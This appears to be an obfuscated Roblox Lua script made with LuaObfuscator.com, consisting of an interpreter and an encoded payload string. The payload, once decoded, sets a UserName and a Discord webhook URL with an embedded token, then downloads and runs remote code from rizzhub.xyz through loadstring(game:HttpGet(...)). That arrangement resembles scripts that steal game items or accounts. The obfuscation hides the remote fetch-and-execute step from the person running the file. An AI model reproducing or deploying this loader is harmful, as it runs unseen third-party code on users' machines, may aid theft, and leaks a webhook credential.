--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v31)if (v1(v31,2)==79) then v20=v0(v3(v31,1,1));return "";else local v75=v2(v0(v31,16));if v20 then local v94=v5(v75,v20);v20=nil;return v94;else return v75;end end end);v21=nil;v18=1;end if (1==v18) then function v21(v32,v33,v34)if v34 then local v76=345 -(6 + 339) ;local v77;while true do if (v76==0) then v77=(v32/(2^(v33-(2 -(2 -1)))))%((1267 -(515 + 750))^(((v34-1) -(v33-(3 -2))) + (437 -(380 + 56)))) ;return v77-(v77%(3 -2)) ;end end else local v78=0 -0 ;local v79;while true do if (v78==((438 -153) -(64 + 221))) then v79=(1 + 1)^(v33-1) ;return (((v32%(v79 + v79))>=v79) and ((468 + 364) -(716 + (272 -157)))) or (0 -(1512 -(352 + 1160))) ;end end end end v22=nil;function v22()local v35=v1(v16,v19,v19);v19=v19 + 1 ;return v35;end v23=nil;v18=2;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v36=0;local v37;local v38;local v39;local v40;local v41;local v42;local v43;local v44;while true do if (v36~=(2 -1)) then else v39=nil;v40=nil;v36=1301 -(1163 + 136) ;end if (v36==3) then v43=nil;v44=nil;v36=4;end if (v36~=(3 + 1)) then else while true do if (v37==0) then local v99=0 + 0 ;while true do if (v99~=0) then else v38=0 -0 ;v39=nil;v99=1;end if (v99~=(229 -(83 + 145))) then else v37=2 -1 ;break;end end end if (v37==2) then local v100=0 -0 ;while true do if (v100==(0 -0)) then v42=nil;v43=nil;v100=787 -(498 + 288) ;end if (v100==1) then v37=2 + 1 ;break;end end end if (v37==1) then local v101=0;while true do if (0==v101) then v40=nil;v41=nil;v101=2 -1 ;end if (v101==(2 -1)) then v37=1412 -(760 + 650) ;break;end end end if (v37==3) then v44=nil;while true do local v102=0 + 0 ;while true do if (v102==0) then if (v38==(1786 -(185 + 1598))) then for v110=1,v24() do v40[v110-1 ]=v29();end for v112=1,v24() do v41[v112]=v24();end return v42;end if (v38==(1108 -(207 + 900))) then local v105=0 -0 ;local v106;while true do if (v105==(0 -0)) then v106=0 + 0 ;while true do if (v106==(2 -1)) then v44={};v38=2;break;end if (v106==(0 -0)) then local v148=0 -0 ;while true do if (v148~=1) then else v106=1 -0 ;break;end if (v148==(1225 -(368 + 857))) then v42={v39,v40,nil,v41};v43=v24();v148=1 + 0 ;end end end end break;end end end v102=1 -0 ;end if (v102~=(1 + 0)) then else if (2~=v38) then else local v107=0;while true do if (0~=v107) then else for v127=1527 -(1430 + 96) ,v43 do local v128=0 + 0 ;local v129;local v130;local v131;local v132;while true do if (v128==2) then while true do if (v129~=0) then else local v156=0 + 0 ;while true do if (v156==(686 -(101 + 584))) then v129=1;break;end if (v156==0) then v130=0 + 0 ;v131=nil;v156=1905 -(400 + 1504) ;end end end if (v129==1) then v132=nil;while true do if (v130~=0) then else local v170=90 -(22 + 68) ;local v171;while true do if (v170==(1789 -(950 + 839))) then v171=0;while true do if (0==v171) then local v180=0;while true do if (v180~=(0 + 0)) then else v131=v22();v132=nil;v180=1;end if (v180~=(2 -1)) then else v171=1;break;end end end if ((1 + 0)==v171) then v130=2 -1 ;break;end end break;end end end if ((1462 -(1049 + 412))~=v130) then else if (v131==(1 + 0)) then v132=v22()~=0 ;elseif (v131==(3 -1)) then v132=v25();elseif (v131==(2 + 1)) then v132=v26();end v44[v127]=v132;break;end end break;end end break;end if (v128==0) then v129=0;v130=nil;v128=1547 -(893 + 653) ;end if (1~=v128) then else v131=nil;v132=nil;v128=212 -(114 + 96) ;end end end v42[3]=v22();v107=1;end if (v107==(2 -1)) then for v133=1,v24() do local v134=516 -(397 + 119) ;local v135;local v136;while true do if (v134==1) then while true do if (v135~=(0 -0)) then else v136=v22();if (v21(v136,1 -0 ,1076 -(619 + 456) )==0) then local v158=0 + 0 ;local v159;local v160;local v161;local v162;local v163;while true do if (v158~=(1 + 0)) then else v161=nil;v162=nil;v158=2;end if (v158==(1112 -(722 + 388))) then v163=nil;while true do if (v159==1) then local v177=0;while true do if (v177==(0 -0)) then v162=nil;v163=nil;v177=1 -0 ;end if (v177==1) then v159=1931 -(1849 + 80) ;break;end end end if (v159~=2) then else while true do if ((1436 -(260 + 1174))==v160) then local v181=0;local v182;while true do if (v181==0) then v182=0;while true do if ((1 + 0)==v182) then v160=5 -2 ;break;end if (v182==0) then local v191=0 + 0 ;while true do if ((0 + 0)~=v191) then else if (v21(v162,1 + 0 ,3 -2 )==1) then v163[6 -4 ]=v44[v163[1 + 1 ]];end if (v21(v162,3 -1 ,2)~=(1 + 0)) then else v163[3]=v44[v163[3]];end v191=1;end if (v191==1) then v182=1;break;end end end end break;end end end if ((82 -(26 + 53))~=v160) then else if (v21(v162,3,4 -1 )==1) then v163[4]=v44[v163[4]];end v39[v133]=v163;break;end if (v160==(2 -1)) then local v184=0;local v185;while true do if (v184~=(0 + 0)) then else v185=0;while true do if (v185==(0 -0)) then local v192=0;while true do if ((470 -(460 + 10))~=v192) then else v163={v23(),v23(),nil,nil};if (v161==(0 -0)) then local v199=0;local v200;local v201;while true do if (v199~=0) then else v200=0 + 0 ;v201=nil;v199=387 -(45 + 341) ;end if (1==v199) then while true do if (v200~=0) then else v201=0;while true do if (0==v201) then v163[6 -3 ]=v23();v163[10 -6 ]=v23();break;end end break;end end break;end end elseif (v161==1) then v163[5 -2 ]=v24();elseif (v161==2) then v163[1782 -(1687 + 92) ]=v24() -(2^(47 -31)) ;elseif (v161==3) then local v205=0;local v206;local v207;while true do if (v205==(1 -0)) then while true do if ((357 -(312 + 45))==v206) then v207=859 -(118 + 741) ;while true do if (v207==0) then v163[3]=v24() -(2^16) ;v163[4]=v23();break;end end break;end end break;end if (v205==0) then v206=0;v207=nil;v205=1;end end end v192=1 + 0 ;end if (v192==1) then v185=1163 -(336 + 826) ;break;end end end if (1==v185) then v160=1569 -(214 + 1353) ;break;end end break;end end end if (v160~=0) then else local v186=0;local v187;local v188;while true do if (v186~=0) then else v187=1721 -(807 + 914) ;v188=nil;v186=1;end if (v186==1) then while true do if (v187==0) then v188=0 -0 ;while true do if (v188~=1) then else v160=2 -1 ;break;end if ((649 -(110 + 539))~=v188) then else local v193=0 + 0 ;local v194;while true do if (v193==(0 + 0)) then v194=0;while true do if (v194==1) then v188=1 + 0 ;break;end if (v194==(0 + 0)) then local v204=0 -0 ;while true do if (v204~=1) then else v194=1 + 0 ;break;end if (v204==(346 -(85 + 261))) then v161=v21(v136,2,2 + 1 );v162=v21(v136,1 + 3 ,21 -15 );v204=339 -(73 + 265) ;end end end end break;end end end end break;end end break;end end end end break;end if (v159==0) then v160=0 -0 ;v161=nil;v159=1;end end break;end if (v158~=0) then else v159=0;v160=nil;v158=1;end end end break;end end break;end if (v134~=(0 + 0)) then else local v150=0 + 0 ;local v151;while true do if (v150==0) then v151=0;while true do if (v151==(0 -0)) then v135=0 -0 ;v136=nil;v151=1;end if (v151~=(408 -(244 + 163))) then else v134=1 + 0 ;break;end end break;end end end end end v38=3;break;end end end if (v38~=0) then else local v108=0;local v109;while true do if (v108==0) then v109=0;while true do if (v109~=(473 -(358 + 114))) then else v41={};v38=1;break;end if (v109~=0) then else local v149=1282 -(884 + 398) ;while true do if (v149==1) then v109=1362 -(1141 + 220) ;break;end if (v149==(0 + 0)) then v39={};v40={};v149=1 + 0 ;end end end end break;end end end break;end end end break;end end break;end if ((0 + 0)~=v36) then else v37=0;v38=nil;v36=1550 -(978 + 571) ;end if (v36~=(1 + 1)) then else v41=nil;v42=nil;v36=3 + 0 ;end end end v18=5;end if (v18==2) then function v23()local v45,v46=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 + 0 ;return (v46 * (455 -199)) + v45 ;end v24=nil;function v24()local v47=0 + 0 ;local v48;local v49;local v50;local v51;while true do if (v47==1) then return (v51 * (16779156 -(1612 + 328))) + (v50 * (193677 -128141)) + (v49 * (365 -109)) + v48 ;end if (v47==((1786 -997) -(252 + 537))) then v48,v49,v50,v51=v1(v16,v19,v19 + 3 );v19=v19 + 4 ;v47=1 + 0 ;end end end v25=nil;v18=3;end if (v18==3) then function v25()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v52==(1525 -(576 + 157 + 792))) then v53=v24();v54=v24();v52=52 -(17 + 34) ;end if (v52==(1727 -(547 + 1178))) then v57=v21(v54,15 + 6 ,31);v58=((v21(v54,13 + 19 )==(1539 -(972 + (2452 -(937 + 949))))) and  -(1 + 0)) or 1 ;v52=8 -5 ;end if (v52==((1037 -(765 + 270)) -(89 -(20 + 68)))) then v55=(584 -(194 + 389)) + 0 ;v56=(v21(v54,1,761 -(719 + (1206 -(344 + 840))) ) * ((5 -3)^(23 + 9))) + v53 ;v52=782 -(685 + 95) ;end if (v52==(177 -(19 + 155))) then if (v57==(0 + 0)) then if (v56==(977 -(318 + 659))) then return v58 * 0 ;else v57=1 -0 ;v55=1343 -(127 + 1216) ;end elseif (v57==(8091 -6044)) then return ((v56==(0 -0)) and (v58 * ((1 + 0)/(0 + 0)))) or (v58 * NaN) ;end return v8(v58,v57-1023 ) * (v55 + (v56/((1 + 1)^(128 -76)))) ;end end end v26=nil;function v26(v59)local v60;if  not v59 then v59=v24();if (v59==(0 -0)) then return "";end end v60=v3(v16,v19,(v19 + v59) -(1 + 0) );v19=v19 + v59 ;local v61={};for v68=1 + 0 , #v60 do v61[v68]=v2(v1(v3(v60,v68,v68)));end return v6(v61);end v27=v24;v18=4;end if (5==v18) then v30=nil;function v30(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=1;local v71= -1;local v72={...};local v73=v12("#",...) -1 ;local function v74()local v80=v65;local v81=v66;local v82=v67;local v83=v28;local v84={};local v85={};local v86={};for v90=0 + 0 ,v73 do if (((18267 -14120)>(2417 -1081)) and (v90>=v82)) then v84[v90-v82 ]=v72[v90 + (1 -0) ];else v86[v90]=v72[v90 + (72 -(43 + 28)) ];end end local v87=(v73-v82) + 1 + 0 ;local v88;local v89;while true do local v91=0 -0 ;local v92;while true do if (((5743 -4106)>=454) and (v91==0)) then v92=0 -0 ;while true do if ((v92==(1 -0)) or ((2110 -1305)>(4107 -1610))) then if ((v89<=(5 -1)) or ((3806 -916)<=(367 + 2174))) then if ((v89<=(4 -(1 + 2))) or ((3963 -(1114 + 22))<=(2751 -895))) then if ((v89==(1489 -(1106 + 383))) or ((1005 -547)>(738 + 3613))) then v70=v88[1809 -(296 + (3703 -2193)) ];else local v116=0 -0 ;local v117;local v118;local v119;local v120;while true do if ((v116==0) or (1655<(1103 + 95))) then v117=0;v118=nil;v116=1 + 0 ;end if ((v116==(1006 -(155 + 313 + 536))) or (3196==((1544 -599) + 62))) then while true do if ((3007==3007) and ((2 -1)==v117)) then v120=nil;while true do if ((v118==1) or ((4124 -1663)<(2937 -(463 + (873 -647))))) then v86[v119 + (52 -(47 + 4)) ]=v120;v86[v119]=v120[v88[28 -(6 + 18) ]];break;end if (((3359 -(813 + 2 + 20))<=(1291 + 2875)) and (v118==(0 + 0))) then local v167=0 -(0 + 0) ;while true do if ((v167==1) or ((2054 -(1415 + 83))>=(277 + 308))) then v118=1 + 0 ;break;end if (((1274 -(40 + 1046 + 188))==v167) or (2513>=((4667 + 1069) -2793))) then local v174=0;while true do if (((1606 -(880 + 173))<(258 + 3288)) and ((1 -0)==v174)) then v167=1 + (0 -0) ;break;end if ((((583 + 466) -694)<(1063 + 738)) and (v174==(0 -0))) then v119=v88[4 -(1 + 1) ];v120=v86[v88[3 + 0 ]];v174=1865 -(608 + 1256) ;end end end end end end break;end if ((((0 + 0) -0)==v117) or (119>=4164)) then local v155=0 + 0 + 0 ;while true do if ((v155==(1 + 0)) or (2593<(2943 -2226))) then v117=1;break;end if ((((1980 -(668 + 969)) + 25)<=4732) and (v155==(0 -0))) then v118=0;v119=nil;v155=1 + (0 -0) ;end end end end break;end if (((3881 -2827)<(2670 -(273 + 775))) and (v116==(2 -(188 -(177 + 10))))) then v119=nil;v120=nil;v116=2;end end end elseif ((v89<=(1 + 1)) or ((2416 -(81 + 1139))>(2990 -(59 + 935)))) then v86[v88[1249 -(795 + 452) ]]();elseif (((923 + 3437)>(3956 -(1216 + 113))) and (v89==3)) then local v137=0 + 0 ;local v138;while true do if (((503 + 3264)>(3204 -1943)) and (v137==(0 + 0))) then v138=v88[5 -3 ];v86[v138]=v86[v138](v13(v86,v138 + 1 + 0 ,v71));break;end end else v64[v88[4 -1 ]]=v86[v88[4 -2 ]];end elseif ((v89<=7) or ((2283 -(567 + 835 + 592))>(3032 -(1252 + 538)))) then if ((v89<=(4 + 1)) or (2890==(2502 + 706))) then v86[v88[1998 -(1309 + 687) ]]=v64[v88[3 -0 ]];elseif (((4751 -(220 + 589))>=279) and (v89>(803 -(725 + 72)))) then local v141=0 + 0 ;local v142;local v143;local v144;local v145;local v146;while true do if (((2 + 60 + 168)<=(1854 -(988 + 308))) and (v141==(0 + 0))) then v142=0 + 0 ;v143=nil;v141=(161 -51) -(65 + 41 + 3) ;end if (((3023 -(791 + 832))<(1416 + 33)) and (v141==((1 -0) -0))) then v144=nil;v145=nil;v141=1782 -(1255 + 525) ;end if ((v141==2) or (((334 + 6389) -4392)>=(5597 -(812 + 324)))) then v146=nil;while true do if (((5661 -2746)>=(670 + 240)) and (v142==(2 + 0))) then for v168=v143,v71 do local v169=0 + 0 ;while true do if (((2835 -(504 + 754))<((3047 + 389) -(30 + 24))) and ((927 -(177 + 750))==v169)) then v146=v146 + 1 ;v86[v168]=v144[v146];break;end end end break;end if ((v142==(1 + 0 + 0)) or (3040>=(7446 -4258))) then v71=(v145 + v143) -(685 -(283 + 401)) ;v146=0 -0 ;v142=1837 -(763 + 1072) ;end if (((1949 -(1309 + (2380 -(1094 + 646))))==v142) or ((3648 -(9169 -6435))>(2531 -(922 + 556)))) then local v157=0 -0 ;while true do if ((v157==1) or (1248==(3219 -((76 -36) + 299)))) then v142=1 + 0 + 0 ;break;end if (((258 + 1135)<(16846 -12336)) and (v157==(656 -(565 + 91)))) then v143=v88[2 -0 ];v144,v145=v83(v86[v143](v13(v86,v143 + (1552 -(808 + 743)) ,v88[2 + 1 ])));v157=(1162 -(351 + 810)) + 0 ;end end end end break;end end else do return;end end elseif (((5449 -3553)==(261 + 1635)) and (v89<=(1650 -(1094 + 548)))) then v86[v88[2 + 0 ]]=v88[1 + 2 ];elseif ((v89>(23 -14)) or (4358<(3674 -(503 + 784)))) then v86[v88[2]]=v88[3]~=(0 -0) ;elseif ((v86[v88[2 -0 ]]==v88[4]) or ((6771 -3680)==(179 + 4482))) then v70=v70 + (592 -(371 + 220)) ;else v70=v88[1 + 2 ];end v70=v70 + 1 ;break;end if (((19973 -15688)<4410) and (v92==(870 -(810 + 60)))) then local v103=0;local v104;while true do if ((792<((2999 -(1595 + 259)) + 2313)) and (v103==(0 + 0))) then v104=0 + 0 ;while true do if (((3948 -(60 + 61))>1033) and (v104==0)) then v88=v80[v70];v89=v88[1380 -(1233 + 146) ];v104=1364 -(1035 + 328) ;end if ((v104==(2 -(1 + 0))) or ((837 + 431)>=(13098 -9239))) then v92=1 -0 ;break;end end break;end end end end break;end end end end A,B=v28(v11(v74));if  not A[1] then local v93=v62[4][v70] or "?" ;error("Script error at ["   .. v93   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403243O00682O7470733A2O2F72692O7A6875622E78797A2F736372697074732F4D61696E2E6C756103083O00557365724E616D65030F3O003O3977726C643O3977726C643903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039363031373833353136393433353637392F2O7954445266486341777564784241346B376D34654650306D6433374C6B4533614677716A7567566D2O503051545F7548724A4B4F6D547A6D625A48444966375833305A00153O0012083O00013O0026093O000C0001000200044O000C0001001205000100033O001205000200043O002001000200020005001208000400064O000A000500014O0007000200054O000300013O00022O000200010001000100044O001400010026093O00010001000100044O00010001001208000100083O001204000100073O0012080001000A3O001204000100093O0012083O00023O00044O000100012O00063O00017O00153O00023O00043O00043O00053O00053O00053O00053O00053O00053O00053O00053O00063O00083O00083O00093O00093O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
